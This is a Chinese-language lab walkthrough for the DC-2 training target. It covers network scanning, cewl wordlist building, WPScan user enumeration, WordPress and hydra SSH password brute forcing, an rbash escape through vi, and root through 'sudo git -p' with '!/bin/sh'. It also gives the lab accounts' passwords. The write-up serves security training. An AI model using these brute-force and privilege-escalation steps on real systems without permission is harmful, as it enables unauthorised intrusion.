DC2靶机渗透测试教学文档

环境准备

1. 导入DC2靶机镜像
2. 网络适配器选择NAT模式，确保与Kali攻击机处于同一IP段

信息收集阶段

1. 网络扫描

# 查看本机IP
ifconfig

# 扫描同网段IP
nmap -sn 192.168.84.0/24

# 全面扫描发现的靶机IP
nmap -A -p- 192.168.84.143

发现开放端口：

• 80端口：HTTP服务
• 7744端口：SSH服务（修改了默认端口）

2. Web服务分析

访问HTTP服务时发现重定向到dc-2域名，需修改hosts文件：

vim /etc/hosts
# 添加：192.168.84.143 dc-2

访问网站后找到Flag1，提示需要以个人身份登录。

密码字典生成

使用cewl工具生成密码字典：

cewl http://dc-2 -w pass.txt

常用参数：

• -d <x>：爬行深度，默认2
• -m：最小单词长度，默认3
• -w：输出到文件
• --with-numbers：允许包含数字的单词

WordPress扫描

使用WPScan进行扫描：

# 更新漏洞库
wpscan --update

# 枚举用户
wpscan --url http://dc-2 -e u

发现三个用户：admin、jerry、tom

暴力破解

1. WordPress后台爆破

# 将用户名保存到user.txt
echo -e "admin\njerry\ntom" > user.txt

# 使用wpscan爆破
wpscan --url http://dc-2 -U user.txt -P pass.txt

使用jerry账号登录后台，在Pages中找到Flag2，提示不能继续攻击网站。

2. SSH服务爆破

hydra -L user.txt -P pass.txt ssh://192.168.84.143 -s 7744 -vV

成功爆破出tom的密码：parturient

权限提升

1. 突破rbash限制

ssh tom@192.168.84.143 -p 7744

发现被限制在rbash环境中，使用vi逃逸：

vi
:set shell=/bin/sh
:shell

设置PATH环境变量：

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin

找到Flag3，提示切换到jerry用户。

2. 切换到jerry用户

su jerry
密码：adipiscing

3. Git提权

检查sudo权限：

sudo -l

发现jerry可以无密码以root身份执行git命令。

利用git提权：

sudo git -p
# 在分页界面输入
!/bin/sh

成功获取root权限，找到最终flag。

工具总结

1. cewl：网页关键字抓取工具，生成密码字典
2. WPScan：WordPress漏洞扫描工具
3. hydra：网络服务暴力破解工具
4. rbash逃逸：通过vi设置shell环境
5. Git提权：利用sudo权限执行git命令获取root shell

注意事项

1. 确保靶机和攻击机在同一网络段
2. 遇到域名重定向时及时修改hosts文件
3. 暴力破解前先尝试常见弱口令
4. 受限shell环境下寻找逃逸方法
5. 检查sudo权限时注意可利用的命令